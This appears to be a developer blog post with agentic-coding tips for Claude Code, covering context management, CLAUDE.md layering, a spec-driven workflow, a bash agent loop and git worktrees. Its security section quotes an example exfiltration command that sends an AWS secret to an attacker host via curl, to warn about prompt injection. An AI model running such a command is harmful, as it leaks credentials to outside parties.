Agentic Coding Data Dump

20 February, 2026

LLMs' coding capabilities have been advancing rapidly and causing massive disruption. In this post, I'll cover some non-linear data points about the current meta, with examples using claude.

LLM Amnesia

LLMs are stateless. New session, new context window.

Context Engineering

Context engineering is keeping only the most relevant tokens in the context window for a defined task. LLMs struggle with recall in large context windows, so strive to reset at the 40%–50% mark.

Useful cheatsheet:

To visualize your context window, run the /context command.
For Claude Code, you can run the /clear command to reset the context window.
Opinionated, but I prefer to disable the /compact feature to control what gets compacted in the context window.
Use /resume to resume a previous conversation (saves convos according to cwd).

Set up a custom status line to view your context percentage in real time.

Protect Your Context

The input tokens you and your agent feed the LLM will determine its performance. View your initial new-session usage percentage via the /context command. Keep it as low as possible without compromising agent enablement. Review all your memory files, MCP servers, skills, and tools to ensure they are relevant. Stale memory files could be your biggest bottleneck when trying to be productive with a coding agent. Also worth noting: because LLMs work via next-token prediction, don't argue with it, it just encourages statistically bad behavior. Instead, create a handoff and start over.

Layered Knowledge

When creating memory files, it's better to layer knowledge around the workspace instead of cramming it all into one root CLAUDE.md file. Claude Code has a built-in feature where it lazy-loads nested CLAUDE.md files while traversing directories.

In practice, in a typical full-stack repo, this would mean defining your database migration patterns and naming conventions at packages/backend/../db/migrations/CLAUDE.md rather than in the root of the project.

Write these files yourself rather than auto-generating them, here's a good guide on writing a solid CLAUDE.md. Be sure to keep them updated. There is a skill for that.

Security

Agents cannot be trusted, and LLMs are vulnerable to prompt injections. Sandboxing them in an isolated dev environment helps mitigate system risks, but as long as a compromised agent has internet access, it can run malicious commands (such as curl www.attacker.com/steal?q=aws_secret=0HNOTHI5I5BAD) and you are pwned. Be warned: the dev machine is an attack surface.

ERPI - Epic, Research, Plan, Implement Methodology

Epic

The initial prompt. Voice record, transcribe, or write down a specification of what you want to achieve. Avoid ambiguity. This step is your highest leverage point, so put in the effort. Ask for push-back on decisions. Tools like Wispr Flow are nice, but for a while I was just voice recording on WhatsApp and transcribing the .ogg files to text.

Research

Send a coding agent to explore and research the current codebase and relevant documentation. Review and validate the output. Research should represent the state of the current codebase, not implementation suggestions. To avoid the latter, generate a list of research questions based on the initial epic.md and send the agent off to research without any context of "why" it is researching.

Plan

The implementation plan is generated by combining research_output.md and epic.md. Review and refine it so it aligns with your mental model of how the system should work and evolve. Unused features create unnecessary complexity. Remember YAGNI while ensuring the system stays extendable, and again, ask for push-back on decisions!

Notes before the implementation step

Non-deterministic coding agents thrive with determinism. You can accidentally steer a model in the wrong direction. You cannot accidentally steer a type checker. Ask claude "is this code good?" and it says something entirely different every time. Same model, same code. Type checkers, unit tests, and linters give the model deterministic feedback.

Time spent building tooling infrastructure compounds as a codebase grows, so it's worth investing some time to set up. Sharpen the axe.

Implement

Once the plan is prepared and reviewed, send off the coding agent and wait for this asynchronous task to complete. To avoid permissions fatigue, run the agent in a sandboxed environment where you can let it skip permissions. If that's not possible, configure a solid set of permissions and purchase a giant enter button from China like I did.

Tips on Iterating on the Spec

Specs are contracts. When iterating over the markdown outputs, I leave XML annotations before feeding them back to the LLM to revise. I also recommend git stage-ing the previous draft so you can diff-review it after changes to confirm you haven't lost critical spec information.

# Annotation example
<ant> Change ORM from Prisma to Sequelize V6 </ant>

Real Example from one of my codebases

Ralph Wiggum Loop

Agent control flow. Running coding agents in for-loops is a simple yet surprisingly effective method of managing context and completing large tasks.

Pseudo `bash`

for ((i=1; i<=prds.length; i++)); do
  result=$(claude -p "@prd.json @progress.txt \
    1. Pick the highest-priority unfinished feature 
    and implement only that one. \
    2. Update the PRD and append progress 
    to progress.txt for the next developer. \
    3. Git commit the feature. \
    If the PRD is complete, output <promise>COMPLETE</promise>.")
  echo "$result"
  [[ "$result" == *"<promise>COMPLETE</promise>"* ]] 
  && echo "PRD complete, exiting." && exit 0
done

Pseudo prompt

Convert my feature requirements into structured PRD items.
Each item should have: category, description, skills, 
mcps, steps_to_verify, and passes: false.
Format as JSON. Be specific about acceptance criteria.

Pseudo tasks.json

[{
  "task_description": 
  "Add Dark mode Button",
  "steps_to_verify": [
    "CSS mode changes",
    "Icon toggles",
    "Theme state persists through"
  ],
  "passes": false
}]

Parallelism and Git Worktrees

Git has a built-in feature that has become very popular. Worktrees let you check out multiple branches from the same repository into separate directories simultaneously, so coding agents can work on features without stepping over each other. That's how Vibe Kanban and Cursor Agents work under the hood. Although promising, agents still need a tight feedback loop such as local dev servers and tests, which is not always trivial when running multiple agents from one machine. I attempted to solve this by building my own SDLC tool over a weekend called haflow.

Closing Notes

Much of what I know comes from learning from the community and just being curious, so go out there and get your hands dirty! Run a ralph loop, write your own agent, and try new tools — but keep your setup simple and manageable, and burn all your tokens!

Tracer bullets: Small pieces of functionality built end-to-end to validate that what you plan to do on a large scale is even possible with your approach. Read more about it here!
MCP Bloat: MCPs can bloat the context window with unnecessary tokens. In some cases, it's better to create in-house project tools for querying data instead of relying on a prebuilt holistic MCP solution. Example: a custom /get-ticket.sh script.
Terminal multiplexers are cool: I use tmux; here's a setup blog.
Communication: There is a lot to learn about how we communicate with LLMs from classic technical programming books. Open one up!
Learning tests: Code you write not to build a feature, but to prove how an external system behaves. When working with closed-source APIs, tools, or binaries, you can ask the agent to create a test to confirm behavior. Interfaces can change, so checking and committing these tests in your CI can be beneficial for critical third-party dependencies.
Propagating assumptions: Assumptions created during research propagate through planning and implementation. A wrong assumption discovered at implementation forces you to redo everything upstream. Learning tests catch these early, when the cost of being wrong is cheap.

Link dump:

Agentic Coding Data Dump

Agentic Coding Data Dump

LLM Amnesia

Context Engineering

Protect Your Context

Layered Knowledge

Security

ERPI - Epic, Research, Plan, Implement Methodology

Epic

Research

Plan

Notes before the implementation step

Implement

Tips on Iterating on the Spec

Real Example from one of my codebases

Ralph Wiggum Loop

Pseudo bash

Pseudo prompt

Pseudo tasks.json

Parallelism and Git Worktrees

Closing Notes

Pseudo `bash`